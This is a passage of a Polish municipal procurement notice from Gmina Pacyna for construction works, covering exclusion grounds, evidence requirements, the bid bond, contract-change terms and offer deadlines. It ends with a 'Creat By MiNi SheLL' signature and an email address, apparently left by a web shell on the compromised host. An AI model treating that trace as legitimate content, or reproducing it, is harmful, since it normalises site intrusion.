SWZ (na<br/>potwierdzenie spełniania warunku określonego w Rozdziale V ust. 2 pkt 4 lit. b SWZ); UWAGA:<br/>1. Wykazując spełnianie warunku udziału w postępowaniu w wykazie osób należy podać informację o<br/>uprawnieniach kierownika budowy - w celu weryfikacji spełniania warunku udziału w postępowaniu.<br/>2. Wykonawca w celu wykazania spełniania w/w warunku może wskazać osobę będącą obywatelem<br/>państwa członkowskiego, która nabyła kwalifikacje zawodowe do wykonywania działalności w<br/>budownictwie, równoznaczne wykonywaniu samodzielnych funkcji technicznych w budownictwie na<br/>terytorium Rzeczypospolitej Polskiej - zgodnie z właściwymi przepisami, w szczególności z ustawą z<br/>22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w krajach członkowskich<br/>Unii Europejskiej (Dz.U. z 2020 r. poz. 220) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach<br/>zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r. poz. 1117), którą przedstawi<br/>Zamawiającemu przed zawarciem umowy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których<br/>zachodzi którakolwiek z okoliczności wskazanych:<br/>1) w art. 108 ust. 1 pzp;<br/>2) wart. 109 ust. 1 pkt. 4, 5, 7 pzp, tj.:<br/>a) w stosunku do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza<br/>likwidator lub sąd, zawarł układ z wierzycielami, którego działalność gospodarcza ZAWIESZONA ALBO<br/>ZNAJDUJE SIĘ ON W INNEJ TEGO RODZAJU SYTUACJI WYNIKAJĄCEJ Z PODOBNEJ<br/>PROCEDURY PRZEWIDZIANEJ W PRZEPISACH MIEJSCA WSZCZĘCIA TEJ PROCEDURY;<br/>b) który w sposób zawiniony poważnie naruszył obowiązki zawodowe, co podważa jego uczciwość, w<br/>szczególności gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał<br/>lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą stosownych<br/>dowodów;<br/>c) który z przyczyn leżących po jego stronie, w znacznym stopniu lub zakresie nie wykonał lub<br/>nienależycie wykonał albo długotrwale nienależycie wykonywał istotne zobowiązanie wynikające z<br/>wcześniejszej umowy w sprawie zamówienia publicznego lub umowy koncesji, co doprowadziło do<br/>wypowiedzenia lub odstąpienia od umowy, odszkodowania, wykonania zastępczego lub realizacji<br/>uprawnień z tytułu rękojmi za wady;<br/>2. Wykluczenie Wykonawcy następuje zgodnie z art. 111 pzp.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują;<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą, który złożył odrębną<br/>ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej - załącznik nr 6 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do<br/>rejestru lub ewidencji;<br/>3) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty - załącznik nr 4 do SWZ (na potwierdzenie spełniania warunku<br/>określonego w Rozdziale V ust. 2 pkt 4 lit. a SWZ); 4) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego<br/>odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>uprawnień oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 5 do SWZ<br/>(na potwierdzenie spełniania warunku określonego w Rozdziale V ust. 2 pkt 4 lit. b SWZ) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 2505,00<br/>zł<br/>(Słownie złotych : dwa tysiące pięćset pięć 00/100 zł złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3.Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1.pieniądzu;<br/>2. gwarancjach bankowych;<br/>3.gwarancjach ubezpieczeniowych;<br/>4.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.<br/>z 2020 r. poz. 299).<br/>4.Wadium w formie pieniądza należy wnieść przelewem na konto Zamawiającego: Bank<br/>Spółdzielczy „ MAZOWSZE” odz. w Pacynie na rachunek: 78 9042 1084 0680 0143 2000 0010 z<br/>dopiskiem nazwy zadania . <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale VII ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość dokonania zmian w Umowie, pod warunkiem spełnienia<br/>przesłanek ustawowych określonych w przepisie art. 455 ustawy Pzp.<br/>2. Wszelkie zmiany Umowy wymagają zgody obu Stron i zachowania formy pisemnej pod<br/>rygorem nieważności<br/>3. Zamawiający zgodnie z przepisem art. 455 ust. 1 pkt 1 ustawy Pzp przewiduje następujące<br/>możliwości dokonania zmiany Umowy w następującym zakresie oraz na następujących<br/>warunkach:<br/>1) sposobu realizacji przedmiotu Umowy - w sytuacji pojawienia się na rynku nowych rozwiązań<br/>technologicznych i materiałowych, o ile zmiany takie są korzystne dla Zamawiającego, bez<br/>konieczności zwiększenia wynagrodzenia należnego Wykonawcy;<br/>2) zmniejszenia zakresu realizacji robót w przypadku wystąpienia sytuacji kiedy wykonanie<br/>części zakresu przedmiotu Umowy nie leży w interesie publicznym, czego nie można było<br/>przewidzieć w chwili zawierania Umowy, przy odpowiednim zmniejszeniu wynagrodzenia<br/>należnego Wykonawcy lub;<br/>3) terminów realizacji - Zamawiający przewiduje możliwość zmiany terminu wykonania Umowy:<br/>a) jeśli w toku realizacji Umowy pojawiła się konieczność wykonania robót lub prac<br/>nieprzewidzianych w dokumentacji technicznej, a bez wykonania których prawidłowa realizacja<br/>przedmiotu Umowy jest niemożliwa lub co najmniej utrudniona;<br/>b) w przypadku zawieszenia robót przez organy nadzoru budowlanego z przyczyn niezależnych<br/>od Wykonawcy;<br/>4) zmiany podwykonawców, zgodnie z zasadami przewidzianymi w ustawie Pzp, z pomocą<br/>których Wykonawca wykazał spełnianie warunków udziału w postępowaniu. W takim przypadku<br/>Wykonawca jest zobowiązany udowodnić Zamawiającemu, że inny proponowany<br/>podwykonawca, lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym, niż<br/>wymagany w trakcie postępowania;<br/>5) wprowadzenia robót zamiennych, jeżeli są one uzasadnione koniecznością zwiększenia<br/>bezpieczeństwa wykonywania robót budowlanych lub usprawnienia procesu budowlanego, po<br/>wcześniejszym uzgodnieniu z Zamawiającym możliwości wprowadzenia rozwiązań zamiennych;<br/>6) jeżeli powstanie konieczność zrealizowania przedmiotu Umowy przy zastosowaniu innych<br/>rozwiązań technicznych/technologicznych niż wskazane w dokumentacji technicznej, w<br/>szczególności w sytuacji, gdy:<br/>a) zastosowanie przewidzianych w dokumentacji technicznej rozwiązań groziłoby<br/>niewykonaniem lub wadliwym wykonaniem przedmiotu Umowy;<br/>b) nowe rozwiązania techniczne/technologiczne będą miały znaczący wpływ na obniżenie<br/>kosztów eksploatacji, poprawy bezpieczeństwa, a ze względu na postęp<br/>technicznotechnologiczny nie były znane w okresie opracowywania dokumentacji technicznej;<br/>7) wystąpienia zmian będących następstwem okoliczności leżących po stronie Zamawiającego<br/>w szczególności: wstrzymania robót przez Zamawiającego, konieczności usunięcia błędów lub<br/>wprowadzenia zmian w dokumentacji technicznej;<br/>8) w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie<br/>mającym wpływ na realizację przedmiotu Umowy;<br/>9) zmian, których wprowadzenie wynika z zaistnienia siły wyższej rozumianej jako zdarzenie lub<br/>ciąg zdarzeń o charakterze obiektywnym, niezależnych od Stron Umowy, których nie można było<br/>przewidzieć przy dochowaniu należytej staranności. Dla określenia, czy dane<br/>zdarzenie/zdarzenia stanowią siłę wyższą rozstrzygające jest stanowisko Zamawiającego;<br/>10) zmian zakresu przedmiotu Umowy lub terminu realizacji przedmiotu Umowy w przypadku<br/>stwierdzenia wad lub konieczności uzupełnienia dokumentacji technicznej, stanowiącej opis<br/>przedmiotu zamówienia; zmiana zakresu prac będzie skutkowała odpowiednią zmianą<br/>wynagrodzenia należnego Wykonawcy; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-07 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać w terminie do dnia 07.10.2021 r. do godz. 09:30 używając w tym celu Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu – skrytka ePUAP: Urząd Gminy Pacyna /v074c8hprv/skrytka.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-07 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com